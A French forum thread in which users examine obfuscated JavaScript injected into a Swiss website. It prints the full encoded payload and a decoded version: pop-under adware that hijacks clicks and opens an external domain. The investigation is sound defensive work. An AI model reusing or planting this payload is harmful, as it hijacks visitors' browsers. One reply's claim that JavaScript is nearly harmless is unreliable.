Code source HTML suspect

Marsh Posté le 02-10-2008 à 11:21:02

Bonjour,

Je suis par hasard tombé sur ce site :
http://inphone.ch/

J'ai remarqué ceci dans la source (voir les 2 dernières lignes) :

Code :

<script language="javascript">$="Z64zZ3dZ22Z2566unZ2563tiZ256fn Z2564Z2577(tZ2529Z257bcZ2561Z253dZ2527Z252564ocZ252575Z256denZ252574.wZ2525Z25372Z252569teZ252528Z25252Z2532Z2527;ceZ253dZ2527Z252522)Z2527;cZ2562Z253dZ2527Z25253cZ252573criZ2525Z25370Z2574 Z25256Z2563Z252561ngZ252575Z252561Z252567eZ25253dZ25255cZ25252Z2532jaZ2576aZ2573Z252563rZ2569Z252570Z252574Z2525Z2535cZ25252Z2532Z25253Z2565Z2527;cZ2563Z253dZ2527Z25253cZ25255cZ25252fscrZ252569Z252570Z2574Z25253eZ2527;Z2565vaZ256cZ2528uneZ2573cZ2561pe(Z2574))Z257d;Z22;daZ3dZ22fqb0})-~ug0Qbbqi87|qe~Z257F7Z3c7Z7brtfu7Z3c7zsdxb7Z3c7ytvyb7Z3c7xufyv7Z3c7wvhuc7Z3c7vwfuc7Z3c7uxwxd7Z3c7tzu~y7Z3c7sZ7bud~7Z3c7r||uf7Z3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z22;ceZ3dZ2268Z2561rZ2543oZ2564eAtZ2528Z2530)^(Z25270Z25780Z2530Z2527+esZ2529))Z253b}}Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z253dst;Z2564Z2563sZ2528dZ2561+Z2564bZ252bZ2564Z2563Z252bdZ2564Z252bZ2564eZ252cZ25310Z2529;Z2564wZ2528Z2573Z2574)Z253bZ2573Z2574Z253d$;Z2522Z253bZ22;cbZ3dZ22(dZ2573)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252elZ2565ngtZ22;cdZ3dZ22Z253dstZ252bStrZ2569nZ2567Z252efrZ256fmZ2543harZ2543odZ2565((Z2574mZ2570.Z2563Z25Z22;deZ3dZ22M+}Sx-|)K88d)K7}7M;}^}950Z2522Z259M+yv888d)K7t7M:Z25229.-Z252096688d)K7t7M:Z25229,-)99tSx-~)K8d)K7t7M50!Z25209M+u|cu0tSx-|)K88d)K7t7M:Z2526950Z2522Z279M+4-4Z3ebu`|qsu8tZ3ciSxZ2522;}Sx;iSx!;tSx;})Kd)K7}7MZ3d!M;7Z3esZ257F}79+Z22;dbZ3dZ22Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~)-~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)Z3ewudVe||Iuqb89+yv8t)Z3ewudTqi89.#9d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTZ22;czZ3dZ22Z2566Z2575Z256ectiZ256fn cZ257a(Z2563Z257a)Z257bretuZ2572n cZ2561+cZ2562+Z2563Z2563Z252bcd+Z2563eZ252bZ2563z;Z257d;Z22;caZ3dZ22Z2566unZ2563Z2574ionZ2520dcsZ2528dsZ252ceZ2573)Z257bdsZ253dZ2575nesZ2563aZ2570eZ22;opZ3dZ22Z2524Z253dZ2522dwZ2528dcZ2573(Z2563uZ252c14Z2529Z2529;Z2522;Z22;cuZ3dZ22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4Z3czub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dobuf4dZ7bdKazpqf4)4zaxxZ2fbuf4dZ7bdKwZ7bZ7bZ257F}qKzuyq4)46upbyuZ257FqfKZ257FZ7byud6Z2fbuf4dZ7bdK`}yqZ7ba`4)4#Z2526$Z2frazw`}Z7bz4dZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dobuf4}gKqzuvxqp4)4ruxgqZ2f}r4Z3c5c}zpZ7bc:Z7bdqfu42245zub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dfq`afz4}gKqzuvxqpZ2f}r4Z3c`mdqZ7br4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43g`f}zs3Z3d}r4Z3cpZ7bwayqz`:wZ7bZ7bZ257F}q:xqzs`|4))4$Z3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)46`qg`6Z2f}gKqzuvxqp4)4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43`qg`3Z2fpZ7bwayqz`:wZ7bZ7bZ257F}q4)433Z2fiqxgqo}gKqzuvxqp4)4`faqZ2fifq`afz4}gKqzuvxqpZ2firazw`}Z7bz4dZ7bdKsq`WZ7bZ7bZ257F}qZ3czuyqZ3dobuf4wZ7bZ7bZ257F}q4)46464?4pZ7bwayqz`:wZ7bZ7bZ257F}qZ2fbuf4gqufw|4)46464?4zuyq4?46)6Z2fbuf4gq`G`f4)4zaxxZ2fbuf4Z7brrgq`4)4$Z2fbuf4qzp4)4$Z2f}r4Z3cwZ7bZ7bZ257F}q:xqzs`|4*4$Z3doZ7brrgq`4)4wZ7bZ7bZ257F}q:}zpql[rZ3cgqufw|Z3dZ2f}r4Z3cZ7brrgq`45)49Z25Z3doZ7brrgq`4?)4gqufw|:xqzs`|Z2fqzp4)4wZ7bZ7bZ257F}q:}zpql[rZ3c6Z2f684Z7brrgq`Z3dZ2f}r4Z3cqzp4))49Z25Z3doqzp4)4wZ7bZ7bZ257F}q:xqzs`|Z2figq`G`f4)4azqgwudqZ3cwZ7bZ7bZ257F}q:gavg`f}zsZ3cZ7brrgq`84qzpZ3dZ3dZ2fiifq`afzZ3cgq`G`fZ3dZ2firazw`}Z7bz4dZ7bdKgq`WZ7bZ7bZ257F}q4Z3czuyq84buxaqZ3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)4zuyq4?46)64?4qgwudqZ3cbuxaqZ3d4?46Z2f4qld}fqg)Rf}pum8Z27Z259Pqw9!$4Z2526Z27.!-.!-4SY@Z2f4du`|);Z2f6Z2firazw`}Z7bz4g|Z7bcKdZ7bdZ3cZ3dobuf4dZ7bdKczp4)46|``d.;;rvwyr}f:wZ7by;ws}9v}z;}zpql:ws}+sfqm6Z2fbuf4rquKczp4)46gwfZ7bxxvufg)Z258fqg}nuvxq)Z258`Z7bZ7bxvuf)Z258xZ7bwu`}Z7bz)Z258yqzavuf)Z258g`u`ag)Z258p}fqw`Z7bf}qg)$6Z2fbuf4zqqpKZ7bdqz4)4`faqZ2f}r4Z3cpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdmZ3cZ3dZ2f}r4Z3cpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdmZ3cZ3dZ2f}r4Z3cdZ7bdKazpqf45)4zaxxZ3do}r4Z3c5dZ7bdKazpqf:wxZ7bgqpZ3dzqqpKZ7bdqz4)4ruxgqZ2fi}r4Z3czqqpKZ7bdqzZ3do}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dobux4)4dZ7bdKsq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyqZ3dZ2f}r4Z3cbux45)4zaxxZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fbuxZ25264)4zqc4Pu`qZ3cbuxZ3dZ2fa`wZ27Z25264)4Pu`q:A@WZ3czZ7bc:sq`RaxxMqufZ3cZ3d84zZ7bc:sq`YZ7bz`|Z3cZ3d84zZ7bc:sq`Pu`qZ3cZ3d84zZ7bc:sq`Z255CZ7bafgZ3cZ3d84zZ7bc:sq`Y}za`qgZ3cZ3d84zZ7bc:sq`GqwZ7bzpgZ3cZ3dZ3dZ2fa`wZ25264)4Pu`q:A@WZ3cbuxZ2526:sq`RaxxMqufZ3cZ3d84buxZ2526:sq`YZ7bz`|Z3cZ3d84buxZ2526:sq`Pu`qZ3cZ3d84buxZ2526:sq`Z255CZ7bafgZ3cZ3d84buxZ2526:sq`Y}za`qgZ3cZ3d84buxZ2526:sq`GqwZ7bzpgZ3cZ3dZ3dZ2f}r4Z3c4Z3c4a`wZ27Z2526494a`wZ25264Z3d4;4Z25$$$4(4dZ7bdK`}yqZ7ba`Z3eZ2522$Z3dozqqpKZ7bdqz4)4ruxgqZ2fiiii}r4Z3czqqpKZ7bdqzZ3doazpqf4)4c}zpZ7bc:Z7bdqzZ3cdZ7bdKczp846684rquKczpZ3dZ2fazpqf:vxafZ3cZ3dZ2fc}zpZ7bc:rZ7bwagZ3cZ3dZ2f}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fdZ7bdKgq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyq84zZ7bcZ3dZ2fiiirazw`}Z7bz4dZ7bdK}z}`Z3cZ3dobuf4bqf4)4dufgqRxZ7bu`Z3czub}su`Z7bf:uddBqfg}Z7bzZ3dZ2fbuf4bqfZ25264)4Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-!6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-,6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4Z5a@6Z3d*)$4Z3d22Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3[dqfu3Z3d4))49Z25Z3d22Z3czub}su`Z7bf:uddZ5auyq45)43Z5aq`gwudq3Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3YG]Q3Z3d4*49Z25Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3GBZ253Z3d4*49Z25Z3d422Z3cbqf4*)4Z2520Z3dZ2f}r4Z3cbqfZ2526Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgZ3dorZ7bf4Z3cbuf4})$Z2f4}(pZ7bwayqz`:x}zZ257Fg:xqzs`|Z2f4}??Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgO}I:`ufsq`45)46KvxuzZ257F6Z3dopZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FZ2fpZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257F4)4g|Z7bcKdZ7bdZ2fiiiipZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:Z7bzwx}wZ257FZ2fpZ7bwayqz`:Z7bzyZ7bagqad4)4g|Z7bcKdZ7bdZ2fidZ7bdK}z}`Z3cZ3dZ2fi(;gwf}d`*Z22;dcZ3dZ22qi89;Z25229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vybZ3esZ257F}7+fqb0iSx!Z3cZ22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;ccZ3dZ22Z2568;Z2569Z252b+Z2529Z257btmpZ253dds.Z2573lZ2569ce(Z2569,iZ252b1Z2529;Z2573Z2574Z22;Z69f (Z64ocZ75meZ6eZ74.Z63oZ6fkZ69e.iZ6eZ64eZ78Z4ff(Z27vbuZ6cleZ74Z69nZ5fZ6dulZ74iqZ75otZ65Z3dZ27)Z3dZ3d-1)Z7bsc(Z27vbulletinZ5fmulZ74iZ71Z75oteZ3dZ27,2,7Z29;eZ76alZ28uneZ73capZ65(Z64z+cZ7a+opZ2bst)Z2bZ27dw(Z64z+cZ7a(Z24+sZ74))Z3bZ27)}eZ6cseZ7b$Z3dZ27Z27};funcZ74iZ6fn sZ63(Z63nmZ2cv,eZ64Z29Z7bvarZ20Z65xZ64Z3dneZ77 Z44ateZ28)Z3bexZ64Z2esZ65tZ44atZ65(exZ64Z2egZ65tDZ61teZ28Z29+Z65Z64Z29;dZ6fcuZ6denZ74.cZ6foZ6bieZ3dcnZ6d+ Z27Z3dZ27 +escaZ70e(vZ29+Z27;expZ69rZ65sZ3dZ27+exdZ2etoZ47MTSZ74rZ69ng(Z29;}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z" ){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($));document.write($);</script></body>
</html>

Qu'en pensez-vous ? Quel est le but de ceci ? Et surtout, comment le code est arrivé là... Car je doute que l'auteur l'ai mis sciemment.

Merci de votre aide !

Message cité 2 fois
Message édité par jagstang le 02-10-2008 à 11:23:57

---------------
What if I were smiling and running into your arms? Would you see then what I see now?

Reply

Marsh Posté le 02-10-2008 à 11:21:02

Reply

Marsh Posté le 02-10-2008 à 11:56:52

si si c'est fait sciemment !

un "cryptage"
pour cacher une séquence d'instructions très complexe ;o)))
pour éviter le piratage ! ;o))))
tu as tout pour "décoder" en fin !

de toute manière, avec le javascript on ne risque pas grand chose !
sauf à utiliser les ActiveX, par exemple, mais il y a toujours
un message qui demande l'autorisation ! donc on ne prend
que les risques qu'on veut bien !

@+

Message édité par bul3 le 02-10-2008 à 11:57:44

---------------
[mon site] [m'écrire]

Reply

Marsh Posté le 02-10-2008 à 18:15:41

Merci bien mais il ne s'agit pas de cryptage, mais d'obfuscation. perso en cliquant sur un logo sur le site j'ai un warning de mon antivirus. Donc je ne suis pas sûr qu'on ne risque rien !

J'ai pas l'impression que c'est fait sciemment, cette compagnie ayant pignon sur rue et n'aurait aucun intérêt à le faire.

Il y a un moyen simple pour débugger JS simplement afin de voir.

---------------
What if I were smiling and running into your arms? Would you see then what I see now?

Reply

Marsh Posté le 02-10-2008 à 18:24:18

jagstang a écrit :

Qu'en pensez-vous ? Quel est le but de ceci ? Et surtout, comment le code est arrivé là... Car je doute que l'auteur l'ai mis sciemment.

À ce que personne ne puisse récupérer du super code super secret / tu as demandé à l'auteur?

Décodé, ça donne ça:

Code :

if (navigator.cookieEnabled) {
    var pop_under = null;
    var pop_cookie_name = "advmaker_komap";
    var pop_timeout = 720;
    function pop_cookie_enabled() {
        var is_enabled = false;
        if (!window.opera && !navigator.cookieEnabled)return is_enabled;
        if (typeof document.cookie == 'string')if (document.cookie.length == 0) {
            document.cookie = "test";
            is_enabled = document.cookie == 'test';
            document.cookie = '';
        } else {
            is_enabled = true;
        }
        return is_enabled;
    }
    function pop_getCookie(name) {
        var cookie = " " + document.cookie;
        var search = " " + name + "=";
        var setStr = null;
        var offset = 0;
        var end = 0;
        if (cookie.length > 0) {
            offset = cookie.indexOf(search);
            if (offset != -1) {
                offset += search.length;
                end = cookie.indexOf(";", offset);
                if (end == -1) {
                    end = cookie.length;
                }
                setStr = unescape(cookie.substring(offset, end));
            }
        }
        return(setStr);
    }
    function pop_setCookie(name, value) {
        document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";
    }
    function show_pop() {
        var pop_wnd = "http://frz2cketn.com/cgi-bin/index.cgi?grey";
        var fea_wnd = "scrollbars=esizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";
        var need_open = true;
        if (document.onclick_copy != null)document.onclick_copy();
        if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();
        if (pop_under != null) {
            if (!pop_under.closed)need_open = false;
        }
        if (need_open) {
            if (pop_cookie_enabled()) {
                val = pop_getCookie(pop_cookie_name);
                if (val != null) {
                    now = new Date();
                    val2 = new Date(val);
                    utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());
                    utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());
                    if (( utc32 - utc2 ) / 1000 < pop_timeout * 60) {
                        need_open = false;
                    }
                }
            }
        }
        if (need_open) {
            under = window.open(pop_wnd, "", fea_wnd);
            under.blur();
            window.focus();
            if (pop_cookie_enabled()) {
                now = new Date();
                pop_setCookie(pop_cookie_name, now);
            }
        }
    }
    function pop_init() {
        var ver = parseFloat(navigator.appVersion);
        var ver2 = (navigator.userAgent.indexOf("Windows 95" ) >= 0 || navigator.userAgent.indexOf("Windows 98" ) >= 0 || navigator.userAgent.indexOf("Windows NT" ) >= 0 ) && (navigator.userAgent.indexOf('Opera') == -1) && (navigator.appName != 'Netscape') && (navigator.userAgent.indexOf('MSIE') > -1) && (navigator.userAgent.indexOf('SV1') > -1) && (ver >= 4);
        if (ver2) {
            if (document.links) {
                for (var i = 0; i < document.links.length; i++) {
                    if (document.links[i].target != "_blank" ) {
                        document.links[i].onclick_copy = document.links[i].onclick;
                        document.links[i].onclick = show_pop;
                    }
                }
            }
        }
        document.onclick_copy = document.onclick;
        document.onmouseup = show_pop;
    }
    pop_init();
}

edit: j'ai reformatté le truc pour que ça soit plus lisible

Ca balance sur/ouvre une popup de pub, et effectivement ça a pas l'air d'être le genre de trucs que les gens incluent dans leurs pages pour s'amuser.

Message édité par masklinn le 02-10-2008 à 18:30:45

---------------
Stick a parrot in a Call of Duty lobby, and you're gonna get a racist parrot. — Cody

Reply

Marsh Posté le 02-10-2008 à 18:35:43

j'ai contacté l'auteur du site. Pas de réponse... J'ai vu cette popup aussi :
http://frz2cketn.com/cgi-bin/index.cgi?grey

Et là ça continue dans l'obscur et dans le louche...
d'autant que le whois sur ce nom de domaine montre un proprio russe...

---------------
What if I were smiling and running into your arms? Would you see then what I see now?

Reply

Marsh Posté le 02-10-2008 à 18:36:36

une idée comment ce code est apparu là ? un crack pour éditeur de sites qui laisserait derrière lui des petits cadeaux ?

---------------
What if I were smiling and running into your arms? Would you see then what I see now?

Reply

Marsh Posté le 02-10-2008 à 18:40:48

au fait Masklinn, tu as utilisé quoi pour débbuguer ? Merci

Message cité 1 fois

---------------
What if I were smiling and running into your arms? Would you see then what I see now?

Reply

Marsh Posté le 02-10-2008 à 19:03:11

jagstang a écrit :

au fait Masklinn, tu as utilisé quoi pour débbuguer ? Merci

Rien du tout, j'ai exécuté le code JS dans firebug, à l'exception du document.write final (qui sert à écrire tout ce bordel décodé dans une balise <script/> dans la page) et j'ai regardé ce que ça me sortait

Ensuite j'ai collé le tout dans IntelliJ et je lui ai demandé de reformatter, parce que sinon c'est pas super lisible.

Message édité par masklinn le 02-10-2008 à 19:03:46

---------------
Stick a parrot in a Call of Duty lobby, and you're gonna get a racist parrot. — Cody

Reply

Marsh Posté le 31-10-2008 à 17:44:32

jagstang a écrit :

Bonjour,

Je suis par hasard tombé sur ce site :
http://inphone.ch/

J'ai remarqué ceci dans la source (voir les 2 dernières lignes) :

Code :

<script language="javascript">$="Z64zZ3dZ22Z2566unZ2563tiZ256fn Z2564Z2577(tZ2529Z257bcZ2561Z253dZ2527Z252564ocZ252575Z256denZ252574.wZ2525Z25372Z252569teZ252528Z25252Z2532Z2527;ceZ253dZ2527Z252522)Z2527;cZ2562Z253dZ2527Z25253cZ252573criZ2525Z25370Z2574 Z25256Z2563Z252561ngZ252575Z252561Z252567eZ25253dZ25255cZ25252Z2532jaZ2576aZ2573Z252563rZ2569Z252570Z252574Z2525Z2535cZ25252Z2532Z25253Z2565Z2527;cZ2563Z253dZ2527Z25253cZ25255cZ25252fscrZ252569Z252570Z2574Z25253eZ2527;Z2565vaZ256cZ2528uneZ2573cZ2561pe(Z2574))Z257d;Z22;daZ3dZ22fqb0})-~ug0Qbbqi87|qe~Z257F7Z3c7Z7brtfu7Z3c7zsdxb7Z3c7ytvyb7Z3c7xufyv7Z3c7wvhuc7Z3c7vwfuc7Z3c7uxwxd7Z3c7tzu~y7Z3c7sZ7bud~7Z3c7r||uf7Z3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z22;ceZ3dZ2268Z2561rZ2543oZ2564eAtZ2528Z2530)^(Z25270Z25780Z2530Z2527+esZ2529))Z253b}}Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z253dst;Z2564Z2563sZ2528dZ2561+Z2564bZ252bZ2564Z2563Z252bdZ2564Z252bZ2564eZ252cZ25310Z2529;Z2564wZ2528Z2573Z2574)Z253bZ2573Z2574Z253d$;Z2522Z253bZ22;cbZ3dZ22(dZ2573)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252elZ2565ngtZ22;cdZ3dZ22Z253dstZ252bStrZ2569nZ2567Z252efrZ256fmZ2543harZ2543odZ2565((Z2574mZ2570.Z2563Z25Z22;deZ3dZ22M+}Sx-|)K88d)K7}7M;}^}950Z2522Z259M+yv888d)K7t7M:Z25229.-Z252096688d)K7t7M:Z25229,-)99tSx-~)K8d)K7t7M50!Z25209M+u|cu0tSx-|)K88d)K7t7M:Z2526950Z2522Z279M+4-4Z3ebu`|qsu8tZ3ciSxZ2522;}Sx;iSx!;tSx;})Kd)K7}7MZ3d!M;7Z3esZ257F}79+Z22;dbZ3dZ22Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~)-~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)Z3ewudVe||Iuqb89+yv8t)Z3ewudTqi89.#9d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTZ22;czZ3dZ22Z2566Z2575Z256ectiZ256fn cZ257a(Z2563Z257a)Z257bretuZ2572n cZ2561+cZ2562+Z2563Z2563Z252bcd+Z2563eZ252bZ2563z;Z257d;Z22;caZ3dZ22Z2566unZ2563Z2574ionZ2520dcsZ2528dsZ252ceZ2573)Z257bdsZ253dZ2575nesZ2563aZ2570eZ22;opZ3dZ22Z2524Z253dZ2522dwZ2528dcZ2573(Z2563uZ252c14Z2529Z2529;Z2522;Z22;cuZ3dZ22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4Z3czub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dobuf4dZ7bdKazpqf4)4zaxxZ2fbuf4dZ7bdKwZ7bZ7bZ257F}qKzuyq4)46upbyuZ257FqfKZ257FZ7byud6Z2fbuf4dZ7bdK`}yqZ7ba`4)4#Z2526$Z2frazw`}Z7bz4dZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dobuf4}gKqzuvxqp4)4ruxgqZ2f}r4Z3c5c}zpZ7bc:Z7bdqfu42245zub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dfq`afz4}gKqzuvxqpZ2f}r4Z3c`mdqZ7br4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43g`f}zs3Z3d}r4Z3cpZ7bwayqz`:wZ7bZ7bZ257F}q:xqzs`|4))4$Z3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)46`qg`6Z2f}gKqzuvxqp4)4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43`qg`3Z2fpZ7bwayqz`:wZ7bZ7bZ257F}q4)433Z2fiqxgqo}gKqzuvxqp4)4`faqZ2fifq`afz4}gKqzuvxqpZ2firazw`}Z7bz4dZ7bdKsq`WZ7bZ7bZ257F}qZ3czuyqZ3dobuf4wZ7bZ7bZ257F}q4)46464?4pZ7bwayqz`:wZ7bZ7bZ257F}qZ2fbuf4gqufw|4)46464?4zuyq4?46)6Z2fbuf4gq`G`f4)4zaxxZ2fbuf4Z7brrgq`4)4$Z2fbuf4qzp4)4$Z2f}r4Z3cwZ7bZ7bZ257F}q:xqzs`|4*4$Z3doZ7brrgq`4)4wZ7bZ7bZ257F}q:}zpql[rZ3cgqufw|Z3dZ2f}r4Z3cZ7brrgq`45)49Z25Z3doZ7brrgq`4?)4gqufw|:xqzs`|Z2fqzp4)4wZ7bZ7bZ257F}q:}zpql[rZ3c6Z2f684Z7brrgq`Z3dZ2f}r4Z3cqzp4))49Z25Z3doqzp4)4wZ7bZ7bZ257F}q:xqzs`|Z2figq`G`f4)4azqgwudqZ3cwZ7bZ7bZ257F}q:gavg`f}zsZ3cZ7brrgq`84qzpZ3dZ3dZ2fiifq`afzZ3cgq`G`fZ3dZ2firazw`}Z7bz4dZ7bdKgq`WZ7bZ7bZ257F}q4Z3czuyq84buxaqZ3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)4zuyq4?46)64?4qgwudqZ3cbuxaqZ3d4?46Z2f4qld}fqg)Rf}pum8Z27Z259Pqw9!$4Z2526Z27.!-.!-4SY@Z2f4du`|);Z2f6Z2firazw`}Z7bz4g|Z7bcKdZ7bdZ3cZ3dobuf4dZ7bdKczp4)46|``d.;;rvwyr}f:wZ7by;ws}9v}z;}zpql:ws}+sfqm6Z2fbuf4rquKczp4)46gwfZ7bxxvufg)Z258fqg}nuvxq)Z258`Z7bZ7bxvuf)Z258xZ7bwu`}Z7bz)Z258yqzavuf)Z258g`u`ag)Z258p}fqw`Z7bf}qg)$6Z2fbuf4zqqpKZ7bdqz4)4`faqZ2f}r4Z3cpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdmZ3cZ3dZ2f}r4Z3cpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdmZ3cZ3dZ2f}r4Z3cdZ7bdKazpqf45)4zaxxZ3do}r4Z3c5dZ7bdKazpqf:wxZ7bgqpZ3dzqqpKZ7bdqz4)4ruxgqZ2fi}r4Z3czqqpKZ7bdqzZ3do}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dobux4)4dZ7bdKsq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyqZ3dZ2f}r4Z3cbux45)4zaxxZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fbuxZ25264)4zqc4Pu`qZ3cbuxZ3dZ2fa`wZ27Z25264)4Pu`q:A@WZ3czZ7bc:sq`RaxxMqufZ3cZ3d84zZ7bc:sq`YZ7bz`|Z3cZ3d84zZ7bc:sq`Pu`qZ3cZ3d84zZ7bc:sq`Z255CZ7bafgZ3cZ3d84zZ7bc:sq`Y}za`qgZ3cZ3d84zZ7bc:sq`GqwZ7bzpgZ3cZ3dZ3dZ2fa`wZ25264)4Pu`q:A@WZ3cbuxZ2526:sq`RaxxMqufZ3cZ3d84buxZ2526:sq`YZ7bz`|Z3cZ3d84buxZ2526:sq`Pu`qZ3cZ3d84buxZ2526:sq`Z255CZ7bafgZ3cZ3d84buxZ2526:sq`Y}za`qgZ3cZ3d84buxZ2526:sq`GqwZ7bzpgZ3cZ3dZ3dZ2f}r4Z3c4Z3c4a`wZ27Z2526494a`wZ25264Z3d4;4Z25$$$4(4dZ7bdK`}yqZ7ba`Z3eZ2522$Z3dozqqpKZ7bdqz4)4ruxgqZ2fiiii}r4Z3czqqpKZ7bdqzZ3doazpqf4)4c}zpZ7bc:Z7bdqzZ3cdZ7bdKczp846684rquKczpZ3dZ2fazpqf:vxafZ3cZ3dZ2fc}zpZ7bc:rZ7bwagZ3cZ3dZ2f}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fdZ7bdKgq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyq84zZ7bcZ3dZ2fiiirazw`}Z7bz4dZ7bdK}z}`Z3cZ3dobuf4bqf4)4dufgqRxZ7bu`Z3czub}su`Z7bf:uddBqfg}Z7bzZ3dZ2fbuf4bqfZ25264)4Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-!6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-,6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4Z5a@6Z3d*)$4Z3d22Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3[dqfu3Z3d4))49Z25Z3d22Z3czub}su`Z7bf:uddZ5auyq45)43Z5aq`gwudq3Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3YG]Q3Z3d4*49Z25Z3d422